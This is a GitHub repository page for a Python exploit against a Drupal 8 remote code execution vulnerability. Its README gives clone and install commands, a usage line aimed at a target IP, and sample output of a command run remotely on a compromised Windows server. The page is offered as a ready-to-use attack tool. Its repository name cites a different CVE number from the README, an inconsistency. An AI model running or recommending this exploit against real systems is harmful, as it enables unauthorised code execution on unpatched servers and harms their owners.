Skip to content

Drupal 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

Notifications You must be signed in to change notification settings

5l1v3r1/CVE-2018-7605

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2018-7600

Only working on version 8, not 7.

Install

git clone https://github.com/0xAJ2K/CVE-2018-7600.git
pip3 install -r requirements.txt
python3 CVE-2018-7600.py

Usage

python3 CVE-2018-7600.py -u http://172.31.1.27

Expected output

kali :: /opt/myscripts » ./CVE-2018-7600.py -u http://172.31.1.27 -p http://127.0.0.1:8080
CMD: systeminfo
                                                                                                                        
Host Name:                 Test
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
<snip>

About

Drupal 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%